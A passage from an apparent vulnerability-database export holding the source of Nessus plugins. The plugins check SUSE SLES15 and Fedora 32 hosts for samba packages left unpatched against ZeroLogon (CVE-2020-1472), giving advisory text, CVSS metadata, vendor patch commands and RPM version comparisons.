script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"SUSE SLES15 Security Update : samba (SUSE-SU-2020:2719-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nAdd 'libsmbldap0' to 'libsmbldap2' package to fix upgrades from\nprevious versions. (bsc#1172810)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172810\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-1472/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202719-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a28b90e3\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-2719=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-2719=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2719=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-2719=1\n\nSUSE Linux Enterprise High Availability 15 :\n\nzypper in -t patch SUSE-SLE-Product-HA-15-2020-2719=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-policy0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-binding0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-binding0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc-samr0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libdcerpc0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-krb5pac0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-nbt0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr-standard0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libndr0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libnetapi0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-credentials0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-errors0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-hostconfig0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-passdb0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-policy-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-policy0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamba-util0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsamdb0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbclient0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbconf0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap2-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libsmbldap2-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libtevent-util0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient0-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"libwbclient0-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-client-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-client-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-core-devel-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-debugsource-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-libs-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-libs-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-winbind-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"samba-winbind-debuginfo-4.7.11+git.270.63e2076625b-4.48.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:23:23", "description": "Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-09-24T00:00:00", "type": "nessus", "title": "Fedora 32 : 2:samba (2020-0be2776ed3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2023-05-24T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:32", "p-cpe:/a:fedoraproject:fedora:2:samba"], "id": "FEDORA_2020-0BE2776ED3.NASL", "href": "https://www.tenable.com/plugins/nessus/140760", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-0be2776ed3.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(140760);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/24\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-0be2776ed3\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"Fedora 32 : 2:samba (2020-0be2776ed3)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Security fixes for CVE-2020-1472\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-0be2776ed3\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:32\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^32([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 32\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) 